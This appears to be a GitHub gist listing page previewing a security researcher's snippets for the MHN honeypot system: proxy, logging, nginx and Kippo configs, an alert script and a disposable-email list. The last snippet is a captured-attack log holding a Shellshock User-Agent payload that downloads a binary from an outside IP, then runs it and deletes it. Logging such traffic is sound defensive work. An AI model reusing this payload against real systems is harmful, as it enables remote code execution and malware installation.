Skip to content

Instantly share code, notes, and snippets.

View jatrost's full-sized avatar

Jason Trost jatrost

323 followers · 90 following
View GitHub Profile
@jatrost
jatrost / mhn-install-behind-proxy.md
Last active February 13, 2017 19:10

For each of the files below, make sure the proxy settings are added (and obviously change the user/pass/domain/port)

These need to be set for both the MHN server and the honey systems you intend to deploy on (assuming the honeypots are behind the firewall).

/etc/environment

ALL_PROXY=http://user:[email protected]:8080
HTTP_PROXY=http://user:[email protected]:8080
HTTPS_PROXY=http://user:[email protected]:8080
@jatrost
jatrost / mongo2log.json
Last active July 26, 2016 09:56
{
"channels": [
"amun.events",
"dionaea.connections",
"dionaea.capture",
"glastopf.events",
"beeswarm.hive",
"kippo.sessions",
"conpot.events",
"snort.alerts",
@jatrost
jatrost / mhn-template.json
Last active January 19, 2016 14:30
{
"template": "mhn-*",
"settings": {
"number_of_shards": 5,
"number_of_replicas": 0,
"refresh_interval": "30s"
},
"mappings": {
"_default_": {
"_source": {
@jatrost
jatrost / mhn-email-alert.sh
Created January 12, 2016 00:39
#!/bin/bash
PAST_TIMESTAMP="$(date +%s -d '5 min ago')000"
mongoexport \
--csv --quiet \
--fields timestamp,source_ip,source_port,destination_port,honeypot \
--db mnemosyne \
--collection session \
--query "{ timestamp: {\$gt: new Date($PAST_TIMESTAMP)}}" > /tmp/mhn-report.txt
@jatrost
jatrost / kipp-fixes.md
Created May 11, 2015 01:26

I believe here is the fix. This just needs to be integrated into the kippo deploy.

ensure this is in the kippo.cfg

[honeypot]
ssh_addr = 127.0.0.1
ssh_port = 64222
@jatrost
jatrost / mnemonic-api-example.json
Created January 9, 2015 14:17
Example Query for https://passivedns.mnemonic.no/api1/?apikey=XXXXXXXXXXXXXXXXXXXXX&method=exact&query=www.google.com
{
"ok": true,
"message": "ok",
"result": [
{
"class": "in",
"type": "a",
"query": "www.google.com.",
"answer": "213.155.151.152",
"ttl": 300,
@jatrost
jatrost / honeymap-ssl-ngninx.conf
Last active October 22, 2018 12:55
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
}
server {
listen 8443 ssl;
ssl_certificate /etc/ssl/private/mhn.yourcompany.com.pem;
ssl_certificate_key /etc/ssl/private/mhn.yourcompany.com.pem;
@jatrost
jatrost / disposable-email-domains.txt
Last active August 29, 2015 14:08
sharklasers.com
grr.la
guerrillamail.biz
guerrillamail.com
guerrillamail.de
guerrillamail.net
guerrillamail.org
guerrillamailblock.com
spam4.me
maildrop.cc
@jatrost
jatrost / gist:68464a4d8c66db1807fa
Created October 8, 2014 18:12
vagrant@mhn-server:~$ mongo
MongoDB shell version: 2.6.4
connecting to: test
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
http://docs.mongodb.org/
Questions? Try the support group
http://groups.google.com/group/mongodb-user
> use hpfeeds
@jatrost
jatrost / exploitation-attempts.log
Created September 29, 2014 15:49
True Exploitation attempts
source_ip: 63.131.141.125
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 63.131.141.125
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh